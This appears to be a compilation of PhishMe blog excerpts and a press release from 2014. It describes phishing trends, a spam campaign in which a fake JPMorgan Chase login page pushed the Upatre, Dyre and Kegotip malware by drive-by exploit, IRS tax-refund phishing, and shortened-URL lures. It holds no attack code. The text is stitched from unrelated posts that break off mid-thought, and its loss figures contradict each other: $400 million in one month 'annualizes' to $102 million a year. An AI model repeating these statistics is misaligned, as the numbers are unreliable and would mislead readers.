SC magazine discusses recent research from PhishMe that examined phishing emails with malicious PDF attachments.
Phishing isn’t exactly a new kid on the block. Phishing is one of the most common email-based threats. It is a tried and tested tactic that continues to deliver impressive results for cybercriminals. That’s why phishing continues to grow in popularity. In the month of June 2014 alone, phishing activities totaled $400 million in losses, which could be annualized at $102 million per year.
While it has been around for years, phishing has evolved considerably and has increased in efficiency and effectiveness. In the last six months (as compared to 2013), we’ve seen several differences in the type, size and sophistication of phishing attacks. In this post, we’ll explore the notable differences in the modern phish and discuss new phishing trends that we have seen in 2014 thus far.
#1: There has been an increase in application-targeted attacks.
One of the primary trends that we are seeing in the phishing space, are attacks directed at commonly-used applications like Google Docs, Gmail or Yahoo. In the past, we saw a lot of big brands being attacked. However, today’s criminals are now going after things that are not directly related to the target company. The reason for this is the prevalence of password reuse. While large banks have improved their phishing defenses, personal email accounts provide a channel through which cybercriminals can gain access to individual bank accounts.
This trend is not limited to email programs, however. Considering that financial institutions have increased their defenses, cybercriminals are looking elsewhere and are diversifying their attacks. File sharing websites like Dropbox are major targets, as cybercriminals are able to use bogus links to intercept usernames and passwords. There has also been an increase in attacks targeting industries such as gaming, logistics and travel.
#2: Smaller brands are now being targeted.
While large brands still get a lot of attention, small brands, such as charities, are increasingly on the radar of cybercriminals. Similarly, there are also a lot of university phish. This trend began in 2013, but it has become more prevalent this year. Again, these brands provide a gateway for password reuse that allows cybercriminals to gain access to other things.
Targeted attacks against alumni have also become common in the university space. In most cases, the phisher will attempt to gain control of a university email account in order to reach out to trusted parties (such as boards of directors).
#3: Attack frequency has increased, but size has decreased.
The number of attacks has increased, but the average size of a typical attack has dipped. While those “monster” attacks still exist, most phishing emails are now sent to a fewer number of targets than we saw last year.
#4: Phishing Emails are more believable.
Phishing emails are now much more sophisticated. We’re seeing fewer spelling mistakes and more professionalism in email design, which make the email campaigns much more believable and likely to be successful. Commoditization is driving down prices of phish kits, resulting in a much higher quality presentation.
In summary, each of these trends reflect that fact that cybercriminals are very opportunistic. Today’s cybercriminal is more professional and targeted than ever before. Not only does phishing persist as an attack method, it is increasingly more successful.
How does your organization plan to address the rise in phishing activity? Share your comments below.
Most of us are familiar with the common idiom “If it looks like a duck, swims like a duck, quacks like a duck, then it is probably a duck.” Despite criminals’ constant efforts to change their techniques and tactics, this idiom usually holds true for online crime. Phishers have characteristic techniques in just the same way that malware writers and distributors employ specific tactics. These two don’t often overlap.
However, when they do, it makes for a spectacularly effective attack.
This week, PhishMe’s analysts uncovered spam emails distributed by the Cutwail spamming botnet using a new JP Morgan Chase spam template in conjunction with hostile URLs to distribute two samples of the Dyre Trojan and a copy of the Kegotip information stealer malware. This was done with a two-step attack method that first presents victims with a fake login form. At first glance, this webpage resembles a credential phishing page put together by criminals to trick victims into entering their JPMorgan Chase sign in credentials.
However, a much more insidious attack was taking place as victims visited this page. Loading this page in a Web browser triggers online exploit resources to push a copy of the Upatre malware downloader and execute it on a victim’s machine. This malware was in turn used to obtain the Kegotip malware and one copy of Dyre. If a victim were to enter credentials into the fake sign-in page, he or she would then be presented with the opportunity to download a “Java update” which resulted in an infection involving a second, distinct sample of the Dyre Trojan.
In an interesting twist, the fake sign in does not actually submit victim’s credentials to any drop point or collection resource, passing instead a single email address hard-coded into the webpage as the log in value. Following the competed infection trajectory, seven files were left behind within the infected environment. These files included one compiled Java class, two copies of the Dyre Trojan, one “.db” file associated with the Dyre Trojan, one dropped Upatre executable, one empty .exe file believed to have temporarily contained the original Upatre executable binary, and one Kegotip executable.
Earlier this week, we discussed how 2014 has seen an evolution in the sophistication of the modern cybercriminal. This malware, posing as a phish, is no exception. The ability to catch these types of instances early, makes threat intelligence a must-have.
After some additional thought on this topic, we were reminded of the Verizon Breach Report, which stated that while only 8% of your employees will enter credentials on a phishing page, 18% percent would visit the page, thinking they would be smart enough to know whether it was real or not when they got there.
In this case, the employee would still be infected by the malware by simply visiting the page.
It’s about the time of year when people should be receiving tax refunds from the IRS, which gives attackers a great opportunity to craft phishing emails. PhishMe users recently reported a round of phishing emails purporting to be from the IRS about tax refunds:
The results are in… and we have a winner! After much deliberation among our panel, we’re pleased to announce Gareth Stanyon as our 2nd Annual Phish Throwdown winner. Gareth’s email “Corporate Information Security Breach” addressed a recipient who supposedly violated company policy regarding social media use. To respond to the allegations, the email directs the recipient to click on a link. The email is personalized with the recipient’s name, organization, and department.
Black Hat USA 2014 – Las Vegas, NV – August 05, 2014 – PhishMe® Inc., the leading provider of threat management for organizations concerned about human susceptibility to advanced targeted attacks, today announced record growth for the first half of 2014, with strong bookings growth of over 95 percent for the same period a year ago, in 2013. PhishMe has also experienced healthy demand from enterprises with one-third of the Fortune 100 now adopting PhishMe’s solutions.
Using tiny URLs to redirect users to phishing and malware domains is nothing new, but just because it’s a common delivery tactic doesn’t mean that attackers aren’t using it to deliver new malware samples. We recently received a report of a phishing email from one of our users here at PhishMe that employed a shortened google URL, and led to some surprising malware.
Through the power of user reporting, we received the report, discovered the malicious nature of the shortened URL, and reported the issue to Google – all within a span of 30 minutes. Google reacted quickly and took the link down shortly after our report.